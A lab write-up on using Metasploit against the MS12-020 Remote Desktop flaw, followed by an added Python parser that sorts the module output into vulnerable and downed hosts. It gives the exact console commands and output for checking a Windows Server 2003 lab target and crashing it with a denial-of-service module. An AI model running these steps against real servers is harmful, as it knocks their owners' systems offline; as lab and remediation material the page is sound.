Exploiting the Windows MS12-020 vulnerability with Metasploit (MSF)

Preface

If an attacker sends a series of specially crafted RDP packets to an affected system, this vulnerability can cause a denial of service or allow remote code execution. By default, Remote Desktop Protocol (RDP, default port 3389) is not enabled on any Windows operating system, and systems without RDP enabled are not exposed. In this experiment the target system is subjected to a DoS attack.

0x01 Lab environment

Attacker: Kali Linux
IP: 192.168.8.130
Target: Windows Server 2003 Enterprise x64 SP2
IP: 192.168.8.129

0x02 Vulnerability verification

Use the MSF module auxiliary/scanner/rdp/ms12_020_check to verify whether the target host has this vulnerability:

msf > use auxiliary/scanner/rdp/ms12_020_check
msf auxiliary(ms12_020_check) > set RHOSTS 192.168.8.129
msf auxiliary(ms12_020_check) > info

       Name: MS12-020 Microsoft Remote Desktop Checker
     Module: auxiliary/scanner/rdp/ms12_020_check
    License: Metasploit Framework License (BSD)
       Rank: Normal

Provided by:
  Royce Davis "R3dy" <[email protected]>
  Brandon McCann "zeknox" <[email protected]>

Basic options:
  Name     Current Setting  Required  Description
  ----     ---------------  --------  -----------
  RHOSTS   192.168.8.129    yes       The target address range or CIDR identifier
  RPORT    3389             yes       Remote port running RDP (TCP)
  THREADS  100              yes       The number of concurrent threads

Description:
  This module checks a range of hosts for the MS12-020 vulnerability. 
  This does not cause a DoS on the target.

References:
  https://cvedetails.com/cve/CVE-2012-0002/
  https://technet.microsoft.com/en-us/library/security/MS12-020
  http://technet.microsoft.com/en-us/security/bulletin/ms12-020
  https://www.exploit-db.com/exploits/18606
  https://svn.nmap.org/nmap/scripts/rdp-vuln-ms12-020.nse

After running the module, it reports that the target system is vulnerable:

msf auxiliary(ms12_020_check) > run

[+] 192.168.8.129:3389    - 192.168.8.129:3389 - The target is vulnerable.
[*] Scanned 1 of 1 hosts (100% complete)
[*] Auxiliary module execution completed

0x03 Exploitation

msf auxiliary(ms12_020_check) > use auxiliary/dos/windows/rdp/ms12_020_maxchannelids
msf auxiliary(ms12_020_maxchannelids) > show options 

Module options (auxiliary/dos/windows/rdp/ms12_020_maxchannelids):

   Name   Current Setting  Required  Description
   ----   ---------------  --------  -----------
   RHOST  192.168.8.129    yes       The target address
   RPORT  3389             yes       The target port (TCP)
msf auxiliary(ms12_020_maxchannelids) > run

[*] 192.168.8.129:3389 - 192.168.8.129:3389 - Sending MS12-020 Microsoft Remote Desktop Use-After-Free DoS
[*] 192.168.8.129:3389 - 192.168.8.129:3389 - 210 bytes sent
[*] 192.168.8.129:3389 - 192.168.8.129:3389 - Checking RDP status...
[+] 192.168.8.129:3389 - 192.168.8.129:3389 seems down
[*] Auxiliary module execution completed

After the module runs, the target Windows Server 2003 system blue-screens and goes down.
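From the defender's side, the useful output of the two module runs above is which hosts the checker flagged as vulnerable (they need the MS12-020 patch or RDP disabled) and which hosts the DoS run reported as down. The following parser is an added example, not part of the original post or of Metasploit; it only assumes the per-host line format visible in the console output above, and the second host in the sample is constructed.

```python
import re
from typing import Dict, List

# Per-host result lines as printed by the modules in the write-up above, e.g.
#   [+] 192.168.8.129:3389    - 192.168.8.129:3389 - The target is vulnerable.
#   [+] 192.168.8.129:3389 - 192.168.8.129:3389 seems down
# Progress lines such as "[*] Scanned 1 of 1 hosts" carry no host prefix and are skipped.
RESULT_LINE = re.compile(
    r"^\[(?P<tag>[+*-])\]\s+"
    r"(?P<host>\d{1,3}(?:\.\d{1,3}){3}):(?P<port>\d+)\s+-\s+(?P<msg>.*)$"
)

# Constructed sample: the page's own lines plus a second (made-up) host that was checked.
SAMPLE_OUTPUT = """\
[+] 192.168.8.129:3389    - 192.168.8.129:3389 - The target is vulnerable.
[*] 192.168.8.131:3389    - 192.168.8.131:3389 - Could not connect to RDP service.
[*] Scanned 2 of 2 hosts (100% complete)
[*] Auxiliary module execution completed
[*] 192.168.8.129:3389 - 192.168.8.129:3389 - Sending MS12-020 Microsoft Remote Desktop Use-After-Free DoS
[*] 192.168.8.129:3389 - 192.168.8.129:3389 - 210 bytes sent
[*] 192.168.8.129:3389 - 192.168.8.129:3389 - Checking RDP status...
[+] 192.168.8.129:3389 - 192.168.8.129:3389 seems down
[*] Auxiliary module execution completed
"""


def parse_msf_rdp_output(output: str) -> Dict[str, List[str]]:
    """Bucket host:port targets from msfconsole output for remediation tracking.

    "vulnerable": ms12_020_check printed "The target is vulnerable."
    "down":       the DoS module printed that the RDP service "seems down"
    Other per-host lines (status, byte counts, connection failures) are ignored.
    """
    buckets: Dict[str, List[str]] = {"vulnerable": [], "down": []}
    for line in output.splitlines():
        m = RESULT_LINE.match(line.strip())
        if not m:
            continue
        target = f"{m['host']}:{m['port']}"
        msg = m["msg"].lower()
        if "the target is vulnerable" in msg:
            bucket = "vulnerable"
        elif "seems down" in msg:
            bucket = "down"
        else:
            continue
        if target not in buckets[bucket]:  # de-duplicate repeated lines for one host
            buckets[bucket].append(target)
    return buckets


if __name__ == "__main__":
    for name, hosts in parse_msf_rdp_output(SAMPLE_OUTPUT).items():
        print(f"{name}: {', '.join(hosts) or '(none)'}")
```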
